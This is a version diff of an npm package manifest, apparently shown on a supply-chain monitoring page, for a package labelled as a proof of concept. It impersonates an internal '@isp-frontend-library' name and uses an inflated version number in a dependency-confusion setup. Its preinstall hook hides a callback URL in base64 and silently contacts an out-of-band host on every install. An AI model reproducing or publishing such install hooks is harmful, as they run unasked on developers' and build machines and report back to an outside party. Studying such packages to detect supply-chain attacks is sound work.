@isp-frontend-library/melidata 999.999.999 → 9999.9999.9999

Sign up to get free protection for your applications and to get access to all the features.
Files changed (1) hide show
  1. package/package.json +2 -2
package/package.json CHANGED
@@ -1,13 +1,13 @@
1
1
  {
2
2
  "name": "@isp-frontend-library/melidata",
3
- "version": "999.999.999",
3
+ "version": "9999.9999.9999",
4
4
  "description": "PoC by marvelmaniac",
5
5
  "main": "lib/index.cjs",
6
6
  "files": [
7
7
  "lib"
8
8
  ],
9
9
  "scripts": {
10
- "preinstall": "node -e \"require('https').get(Buffer.from('aHR0cHM6Ly91dmxlbXpqbGl6eWJsZnhwaGhmaDRuZ2I5a2Z4dG5oem4ub2FzdC5mdW4vbXAtc3MtcHJvbW90aW9ucy1saWI=', 'base64').toString(), res => res.on('data', () => {}).on('end', () => {}));\""
10
+ "preinstall": "node -e \"require('https').get(Buffer.from('aHR0cHM6Ly91dmxlbXpqbGl6eWJsZnhwaGhmaDRuZ2I5a2Z4dG5oem4ub2FzdC5mdW4vaXNwLWZyb250ZW5kLWxpYnJhcnk=', 'base64').toString(), res => res.on('data', () => {}).on('end', () => {}));\""
11
11
  },
12
12
  "author": "marvelmaniac",
13
13
  "license": "ISC"